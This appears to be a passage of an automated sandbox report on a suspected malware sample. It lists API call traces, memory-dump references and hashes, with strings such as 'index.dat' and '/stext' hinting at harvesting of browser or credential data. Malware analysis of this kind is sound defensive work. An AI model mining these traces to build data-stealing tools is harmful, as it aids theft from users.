                                                                                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst
                                                                                                    • String ID: *.*$index.dat
                                                                                                    • API String ID: 1974802433-2863569691
                                                                                                    • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                    • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                    • GetLastError.KERNEL32 ref: 004175A2
                                                                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156039329-0
                                                                                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 3397143404-0
                                                                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 1125800050-0
                                                                                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                    • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleSleep
                                                                                                    • String ID: }A
                                                                                                    • API String ID: 252777609-2138825249
                                                                                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                    APIs
                                                                                                    • malloc.MSVCRT ref: 00409A10
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                    • free.MSVCRT ref: 00409A31
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: freemallocmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3056473165-0
                                                                                                    • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                    • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: d
                                                                                                    • API String ID: 0-2564639436
                                                                                                    • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                    • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: BINARY
                                                                                                    • API String ID: 2221118986-907554435
                                                                                                    • Opcode ID: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                    • Opcode Fuzzy Hash: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp
                                                                                                    • String ID: /stext
                                                                                                    • API String ID: 2081463915-3817206916
                                                                                                    • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                    • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp
                                                                                                    • String ID: .#v
                                                                                                    • API String ID: 2081463915-507759092
                                                                                                    • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                    • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                    APIs
                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                    • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2445788494-0
                                                                                                    • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                    • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc
                                                                                                    • String ID: failed to allocate %u bytes of memory
                                                                                                    • API String ID: 2803490479-1168259600
                                                                                                    • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                    • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                    • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                    • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0041BDDF
                                                                                                    • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmpmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1065087418-0
                                                                                                    • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                    • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                    • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                      • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                      • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1381354015-0
                                                                                                    • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                    • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2221118986-0
                                                                                                    • Opcode ID: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                                                    • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                    • Opcode Fuzzy Hash: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                                                    • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004301AD
                                                                                                    • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1297977491-0
                                                                                                    • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                    • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                    • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                    • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                      • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2154303073-0
                                                                                                    • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                    • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                    APIs
                                                                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
